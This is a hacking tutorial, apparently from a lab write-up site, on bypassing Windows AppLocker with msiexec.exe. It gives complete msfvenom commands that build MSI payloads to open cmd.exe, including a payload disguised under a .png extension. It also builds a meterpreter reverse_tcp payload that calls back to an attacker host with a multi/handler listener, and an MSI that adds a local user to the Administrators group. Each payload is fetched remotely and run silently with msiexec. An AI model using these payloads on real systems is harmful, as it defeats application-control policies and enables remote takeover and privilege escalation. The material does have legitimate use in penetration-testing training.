Windows Exploitation: msiexec.exe
In our previous article, we had discussed “Windows Applocker Policy – A Beginner’s Guide” as they define the AppLocker rules for your application control policies and how to work with them. But Today you will learn how to bypass Applocker policies. In this post, we have blocked the “cmd.exe” file using Windows applocker Policy and try to bypass this restriction to get the command prompt.
Table of Content
Associated file formats where Applocker is applicable
Challenge 1: – Bypass Applocker with .msi file to get CMD
Little-Bit more about MSI file
Multiple Methods to get CMD
- Generate a malicious .msi file with Msfvenom -1st Method
- Generate a malicious .msi file with Msfvenom -2nd Method
- Generate a malicious .msi file with Msfvenom -3rd Method
Challenge 2: – Make a local user member of the Administrative Group
- Generate Malicious .msi file with Msfvenom -4th Method
Associated file formats where Applocker is Applicable
Windows applocker is a security policy that was introduced in home windows 7 and windows server 2008 r2 as a method to restrict the usage of unwanted Programs. In this an administrator can restrict the execution of the following programs:
It depends entirely on the system admin which program or script he wants to set the applocker policy for program restriction or execution. There could a situation where Command Prompt (cmd.exe), or Powershell or dll file or batch file or rundll32.exe or regsrv.32 or regasm and many more are blocked.
Challenge 1: – Bypass Applocker with .msi file to get CMD
Let’s suppose you are in a similar situation where all the above-mentioned application is blocked and only Windows Installer file i.e. the .msi extension is allowed to run without any restrictions.
Then how will you use an MSI file to bypass these restrictions and get a full privilege shell?
Little-Bit more about MSI file
The MSI name comes from the original title of the program, Microsoft Installer. Since then the name has changed to Windows Installer. an MSI file extension file is a Windows Package Installer. An installation package contains all the information required to install or uninstall an application by Windows Installer. Each installation package contains a .msi file, which contains an installation database, a summary information stream and data streams for different parts of the installation.
The Windows Installer technology is divided into two parts that work in combination; these include a client-side installer service (Msiexec.exe) and a Microsoft Software Installation (MSI) package file. Windows Installer uses information contained in a package file to install the program.
The Msiexec.exe program is a component of Windows Installer. When it is called by Setup, Msiexec.exe uses Msi.dll to read the package (.msi) files, apply any transform (.mst) files, and incorporate command-line options supplied by Setup. The installer performs all installation-related tasks, including copying files to the hard disk, making registry modifications, creating shortcuts on the desktop, and displaying dialog boxes to prompt for user installation preferences when necessary.
When Windows Installer is installed on a computer, it changes the registered file type of .msi files so that if you double-click a .msi file, Msiexec.exe runs with that file.
Each MSI package file contains a relational-type database that stores instructions and data required to install (and remove) the program across many installation scenarios.
Multiple Methods to get CMD
Generate Malicious .msi file with Msfvenom -1st Method
Now let’s open a new terminal in Kali machine and generate a malicious MSI Package file as cmd.msi to get command prompt through it by utilizing the Windows/exec payload as follows:
msfvenom -p windows/exec CMD=cmd.exe -f msi > cmd.msi python -m SimpleHTTPServer 80
Now transfer cmd.msi file in your Windows machine to obtain the command prompt shell as administrators. Here we have used Python HTTP server for sharing the file in the network.
Once you have downloaded the.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the msi file with msiexec.exe inside the run prompt.
Syntax: msiexec /quiet /i
msiexec /quiet /i C:\Users\raj\Desktop\cmd.msi
As soon as you will hit the above-mentioned command inside run prompt, you will get the Command Prompt.
Generate Malicious .msi file with Msfvenom -2nd Method
Note: Even if you rename the cmd.msi file in another extension, it will bypass the rule.
Repeat above to generate an MSI file with the same payload as msfvenom and named cmd.png. Since I already have a cmd.msi file in my kali, I rename it as cmd.png and used the python server to transfer it.
Once you have downloaded the cmd.png file (which is actually a .msi file) on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the .msi file with msiexec.exe inside the run prompt.
Syntax: msiexec /q /i
msiexec /q /i http://192.168.1.107/cmd.png
As soon as you will hit the above-mentioned command inside run prompt, you will get the Command Prompt.
Generate Malicious .msi file with Msfvenom -3rd Method
In the above methods, we obtain a command prompt by utilizing the Windows/exec payload but now we will use windows/meterpreter/reverse_tcp payload to get full privilege command shell via meterpreter sessions.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 –f msi > shell.msi
Now again transfer shell.msi file in your Windows machine to obtain the command prompt shell as administrators and start multi/handler. Here we have used Python HTTP server for sharing the file in the network.
Once you have downloaded the shell.msi file on your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the .msi file with msiexec.exe inside the run prompt.
Syntax: msiexec /q /i
msiexec /q /i http://192.168.1.107/shell.msi
As soon as you will hit the above-mentioned command inside run prompt, you will get the Command Prompt via the meterpreter session using this exploit.
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.1.107 msf exploit(handler) > set lport 1234 msf exploit(handler) > exploit meterpreter > shell
Challenge 2: – Make a local user member of Administrators Group
Let’s suppose you are in a similar situation where all the above-mentioned applications are blocked and only Windows Installer file i.e. the .msi extension is allowed to run without any restrictions.
Then how will you use an MSI file to bypass these restriction to make a local user member of Administrators Group where cmd.exe is a block?
Note: Here aaru is a local user account which is not non-administrative user account as shown below:
As we know that due to applocker execution rule policy, cmd.exe is blocked on the local machine, therefore we cannot use the command prompt to add aaru in the administrator group.
Generate Malicious .msi file with Msfvenom -4th Method
Generate an MSI package as admin.msi with the windows/exec payload that sends a command instructing to add local admin privileges for the user “aaru”, to the target machine.
msfvenom -p windows/exec CMD='net localgroup administrators aaru /add' -f msi > admin.msi
Now transfer admin.msi file in your Windows machine to add aaru in the administrator’s group. Here we have used Python HTTP server for sharing the file in the network.
Once you have downloaded the admin.msi file your local machine (Windows OS where cmd.exe is blocked by admin), you can use the following syntax to run the admin.msi file with msiexec.exe inside the run prompt.
Syntax: msiexec /q /i
msiexec /q /i http://192.168.1.107/admin.msi
As soon as you will hit the above-mentioned command inside run prompt, you can ensure that the aaru user has become part of the administrator’s account.
Hopefully, it becomes clear to you, that, how you can use a .msi file to compromise an operating system where cmd.exe and other applications are blocked by the administrator.
References:
https://support.microsoft.com/en-gb/help/310598/overview-of-the-windows-installer-technology
https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
great
Good Job mate , keep it up